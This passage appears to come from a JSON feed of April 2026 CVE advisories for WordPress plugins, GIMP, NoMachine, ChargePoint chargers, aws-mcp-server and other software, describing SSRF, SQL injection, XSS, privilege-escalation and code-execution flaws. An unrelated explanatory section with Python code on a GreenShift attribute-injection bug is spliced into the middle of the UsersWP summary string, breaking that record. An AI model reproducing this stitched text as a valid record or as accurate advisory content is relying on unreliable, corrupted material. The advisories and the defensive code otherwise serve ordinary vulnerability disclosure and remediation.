to insufficient URL origin validation in the process_image_crop() method when processing avatar/banner image crop operations. The function accepts a user-controlled URL via the uwp_crop POST parameter and only validates it using esc_url() for sanitization and wp_check_filetype() for extension verification, without enforcing that the URL references a local uploads file. 
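The GreenShift entry (CVE-2026-4895) is a specific kind of encoding bug: the markup is correct until a later `str_replace('src=', 'fetchpriority="high" src=')` runs over the whole HTML string and rewrites a `src=` that sits inside a quoted attribute value, the quotes in the replacement ending that attribute early. The following is an added example written for this page, not the plugin's code. It reproduces the replacement step in Python beside a rewrite that adds the attribute on parsed tags only, and a check that reports event-handler attributes as a parser sees them. The sample block and the class value are constructed contributor input; names are ours:

```python
# Added example (not plugin code): attribute injection through a string
# replacement on raw HTML, and a parser-based rewrite that cannot do that.
import html
from html.parser import HTMLParser


def naive_fetchpriority(markup: str) -> str:
    """str_replace('src=', 'fetchpriority="high" src=', $html): every 'src='
    is rewritten, including one inside a quoted attribute value."""
    return markup.replace('src=', 'fetchpriority="high" src=')


class FetchPriorityRewriter(HTMLParser):
    """Re-serialises markup, adding fetchpriority="high" only to <img>
    elements that really carry a src attribute. Values are re-quoted with
    html.escape so they cannot terminate the attribute they are in."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []

    def _emit_tag(self, tag, attrs, self_closing):
        attrs = list(attrs)
        names = {name for name, _ in attrs}
        if tag == "img" and "src" in names and "fetchpriority" not in names:
            attrs.append(("fetchpriority", "high"))
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None
                         else f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + (" />" if self_closing else ">"))

    def handle_starttag(self, tag, attrs):
        self._emit_tag(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")


def safe_fetchpriority(markup: str) -> str:
    rewriter = FetchPriorityRewriter()
    rewriter.feed(markup)
    rewriter.close()
    return "".join(rewriter.out)


class _HandlerCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def event_handler_attributes(markup: str) -> list:
    """Attribute names beginning with 'on', as a tolerant HTML parser sees
    them. A rewrite must not create any that the author did not write."""
    collector = _HandlerCollector()
    collector.feed(markup)
    collector.close()
    return collector.handlers


# Constructed input: the contributor controls the class attribute of an
# image block; the src is the one the block itself emits.
CONTRIBUTOR_CLASS = "x src=y onfocus=alert(1) autofocus z"
IMAGE_BLOCK = f'<img class="{CONTRIBUTOR_CLASS}" src="a.png">'


if __name__ == "__main__":
    print(naive_fetchpriority(IMAGE_BLOCK))
    print(safe_fetchpriority(IMAGE_BLOCK))
```

After the naive replacement the class attribute closes at the injected quote and `onfocus=alert(1) autofocus` become attributes of the `<img>`; the parser-based rewrite leaves the same text inside the class value, where it is inert.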
The URL is then passed to uwp_resizeThumbnailImage() which uses it in PHP image processing functions (getimagesize(), imagecreatefrom*()) that support URL wrappers and perform outbound HTTP requests. This makes it possible for authenticated attackers with subscriber-level access and above to coerce the WordPress server into making arbitrary HTTP requests to attacker-controlled or internal network destinations, enabling internal network scanning and potential access to sensitive services.","cvss":5.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.0,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08927,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AyeCode/userswp/commit/ca0c81b9c76a26c5ac78a8f3604cf9122a7a4aa1","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.55/includes/class-forms.php#L198","https://plugins.trac.wordpress.org/browser/userswp/tags/1.2.55/includes/helpers/misc.php#L136","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/class-forms.php#L198","https://plugins.trac.wordpress.org/browser/userswp/trunk/includes/helpers/misc.php#L136","https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd2b3fd-1bca-4611-9753-ccb57b0e36a4?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5144","summary":"The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.9.3. This is due to the group blog settings handler accepting the `groupblog-blogid`, `default-member`, and `groupblog-silent-add` parameters from user input without proper authorization checks. The `groupblog-blogid` parameter allows any group admin (including Subscribers who create their own group) to associate their group with any blog on the Multisite network, including the main site (blog ID 1). 
The `default-member` parameter accepts any WordPress role, including `administrator`, without validation against a whitelist. When combined with `groupblog-silent-add`, any user who joins the attacker's group is automatically added to the targeted blog with the injected role. This makes it possible for authenticated attackers, with Subscriber-level access and above, to escalate any user (including themselves via a second account) to Administrator on the main site of the Multisite network.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00049,"ranking_epss":0.14879,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/boonebgorges/bp-groupblog/commit/b824593add9e2c53ef4f0d2e0824d4de0785411f","https://plugins.trac.wordpress.org/browser/bp-groupblog/tags/1.9.3/bp-groupblog.php#L190","https://plugins.trac.wordpress.org/browser/bp-groupblog/tags/1.9.3/bp-groupblog.php#L220","https://plugins.trac.wordpress.org/browser/bp-groupblog/tags/1.9.3/bp-groupblog.php#L450","https://plugins.trac.wordpress.org/browser/bp-groupblog/trunk/bp-groupblog.php#L190","https://plugins.trac.wordpress.org/browser/bp-groupblog/trunk/bp-groupblog.php#L220","https://plugins.trac.wordpress.org/browser/bp-groupblog/trunk/bp-groupblog.php#L450","https://www.wordfence.com/threat-intel/vulnerabilities/id/8129046a-5aa5-4644-babc-0eca9aa524d2?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5207","summary":"The LifterLMS plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 9.2.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for authenticated attackers, with Instructor-level access and above who have the edit_post capability on the quiz, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07436,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/lifterlms/trunk/includes/admin/reporting/tables/llms.table.quiz.non.attempts.php#L190","https://plugins.trac.wordpress.org/browser/lifterlms/trunk/includes/admin/reporting/tables/llms.table.quiz.non.attempts.php#L240","https://plugins.trac.wordpress.org/browser/lifterlms/trunk/includes/class.llms.ajax.handler.php#L243","https://plugins.trac.wordpress.org/changeset/3495818/lifterlms/trunk/includes/admin/reporting/tables/llms.table.quiz.non.attempts.php","https://www.wordfence.com/threat-intel/vulnerabilities/id/43d31d1e-0f4f-4f51-8274-650151642d03?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5217","summary":"The Optimole – Optimize Images | Convert WebP & AVIF | CDN & Lazy Load | Image Optimization plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.2.2. This is due to insufficient input sanitization and output escaping on the user-supplied 's' parameter (srcset descriptor) in the unauthenticated /wp-json/optimole/v1/optimizations REST endpoint. The endpoint validates requests using an HMAC signature and timestamp, but these values are exposed directly in the frontend HTML making them accessible to any visitor. The plugin uses sanitize_text_field() on the descriptor value of rest.php, which strips HTML tags but does not escape double quotes. 
The poisoned descriptor is then stored via transients (backed by the WordPress options table) and later retrieved and injected verbatim into the srcset attribute of tag_replacer.php without proper escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages that will execute whenever a user accesses the injected page.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00078,"ranking_epss":0.23115,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/rest.php#L1008","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/rest.php#L159","https://plugins.trac.wordpress.org/browser/optimole-wp/tags/4.2.1/inc/tag_replacer.php#L526","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/rest.php#L1008","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/rest.php#L159","https://plugins.trac.wordpress.org/browser/optimole-wp/trunk/inc/tag_replacer.php#L526","https://www.wordfence.com/threat-intel/vulnerabilities/id/50417068-339a-4ae5-9c90-8f08f54ce0af?source=cve"],"published_time":"2026-04-11T02:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3358","summary":"The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized private course enrollment in all versions up to, and including, 3.9.7. This is due to missing post_status validation in the `enroll_now()` and `course_enrollment()` functions. Both enrollment endpoints verify the nonce, user authentication, and whether the course is purchasable, but fail to check if the course has a `private` post_status. This makes it possible for authenticated attackers with Subscriber-level access or above to enroll in private courses by sending a crafted POST request with the target course ID. 
The enrollment record is created in the database and the private course title and enrollment status are exposed in the subscriber's dashboard, though WordPress core access control prevents the subscriber from viewing the actual course content (returns 404). Enrollment in private courses should be restricted to users with the `read_private_posts` capability.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00059,"ranking_epss":0.18383,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134","https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2989","https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Course.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8","https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228-4253-bb28-2c2e11af76fd?source=cve"],"published_time":"2026-04-11T02:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3371","summary":"The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authorization checks in the `save_course_content_order()` private method, which is called unconditionally by the `tutor_update_course_content_order` AJAX handler. While the handler's `content_parent` branch includes a `can_user_manage()` check, the `save_course_content_order()` call processes attacker-supplied `tutor_topics_lessons_sorting` JSON without any ownership or capability verification. 
This makes it possible for authenticated attackers with Subscriber-level access or above to detach lessons from topics, reorder course content, and reassign lessons between topics in any course, including admin-owned courses, by sending a crafted AJAX request with manipulated topic and lesson IDs.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07944,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1687","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L1755","https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L252","https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8","https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cf0430-8577-449a-aefe-d7bf606fe2de?source=cve"],"published_time":"2026-04-11T02:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5055","summary":"NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine.  An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the NoMachine Device Server. The product loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. 
Was ZDI-CAN-28494.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02584,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-249/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5058","summary":"aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the MCP server. Was ZDI-CAN-27968.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.01013,"ranking_epss":0.77138,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-246/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5059","summary":"aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of aws-mcp-server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the allowed commands list. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the MCP server. 
Was ZDI-CAN-27969.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.01013,"ranking_epss":0.77138,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-245/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5493","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDSPRJ files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25718.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-255/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5494","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of PDSPRJ files. 
The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25719.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-256/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5495","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of PDSPRJ files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25720.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-257/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5496","summary":"Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Labcenter Electronics Proteus. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PDSPRJ files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25717.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14093,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-254/"],"published_time":"2026-04-11T01:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4154","summary":"GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of XPM files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. 
Was ZDI-CAN-28901.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00063,"ranking_epss":0.19465,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/2e7ed91793792d9e980b2df4c829e9aa60459253","https://www.zerodayinitiative.com/advisories/ZDI-26-221/"],"published_time":"2026-04-11T01:16:17","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4155","summary":"ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging stations. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the genpw script. The issue results from the inclusion of a secret cryptographic seed value within the script. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26340.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00238,"ranking_epss":0.46874,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-195/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4156","summary":"ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex EV chargers. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of OCPP messages. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. 
An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26339.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00072,"ranking_epss":0.21958,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-196/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4157","summary":"ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of ChargePoint Home Flex devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of OCPP messages. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-26338.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00194,"ranking_epss":0.4135,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-197/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4158","summary":"KeePassXC OpenSSL Configuration Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of KeePassXC. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of OpenSSL. The product loads configuration from an unsecured location. 
An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of KeePassXC when run by a target user on the system. Was ZDI-CAN-29156.","cvss":7.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.3,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02584,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/keepassxreboot/keepassxc/security/advisories/GHSA-4gr2-cr97-q9fx","https://www.zerodayinitiative.com/advisories/ZDI-26-215/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5053","summary":"NoMachine External Control of File Path Arbitrary File Deletion Vulnerability. This vulnerability allows local attackers to delete arbitrary files on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of environment variables. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to delete files in the context of root. Was ZDI-CAN-28644.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.02951,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-247/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5054","summary":"NoMachine External Control of File Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. 
An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of command line parameters. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-28630.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.02856,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-248/"],"published_time":"2026-04-11T01:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3691","summary":"OpenClaw Client PKCE Verifier Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose stored credentials on affected installations of OpenClaw. User interaction is required to exploit this vulnerability in that the target must initiate an OAuth authorization flow.\n\nThe specific flaw exists within the implementation of OAuth authorization. The issue results from the exposure of sensitive data in the authorization URL query string. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. 
Was ZDI-CAN-29381.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00061,"ranking_epss":0.19083,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-6g25-pc82-vfwp","https://www.zerodayinitiative.com/advisories/ZDI-26-229/"],"published_time":"2026-04-11T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40354","summary":"Flatpak xdg-desktop-portal before 1.20.4 and 1.21.x before 1.21.1 allows any Flatpak app to trash any file in the host context via a symlink attack on g_file_trash.","cvss":2.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.9,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02526,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/flatpak/xdg-desktop-portal/releases/tag/1.20.4","https://github.com/flatpak/xdg-desktop-portal/releases/tag/1.21.1","https://github.com/flatpak/xdg-desktop-portal/security/advisories/GHSA-rqr9-jwwf-wxgj","https://www.openwall.com/lists/oss-security/2026/04/10/14"],"published_time":"2026-04-11T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4149","summary":"Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sonos Era 300. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the DataOffset field within SMB responses. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the kernel. 
Was ZDI-CAN-28345.","cvss":10.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":10.0,"cvss_v4":null,"epss":0.01272,"ranking_epss":0.79522,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.zerodayinitiative.com/advisories/ZDI-26-192/"],"published_time":"2026-04-11T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4150","summary":"GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PSD files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28807.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00063,"ranking_epss":0.19465,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/00afdabdadeb5457fd897878b1e5aebc3780af10","https://www.zerodayinitiative.com/advisories/ZDI-26-217/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4151","summary":"GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ANI files. 
The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28813.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00063,"ranking_epss":0.19465,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/09e5459de913172fc51da3bd6b6adc533acd368e","https://www.zerodayinitiative.com/advisories/ZDI-26-218/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4152","summary":"GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28863.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00058,"ranking_epss":0.17923,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/f64c9c23ba3c37dc7b875a9fb477c23953b4666e","https://www.zerodayinitiative.com/advisories/ZDI-26-219/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-4153","summary":"GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. 
This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28874.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00058,"ranking_epss":0.17923,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitlab.gnome.org/GNOME/gimp/-/commit/98cb1371fd4e22cca75017ea3252dc32fc218712","https://www.zerodayinitiative.com/advisories/ZDI-26-220/"],"published_time":"2026-04-11T01:16:16","vendor":"gimp","product":"gimp","version":null},{"cve_id":"CVE-2026-3689","summary":"OpenClaw Canvas Path Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenClaw. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the path parameters provided to the canvas gateway endpoint. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the service account. 
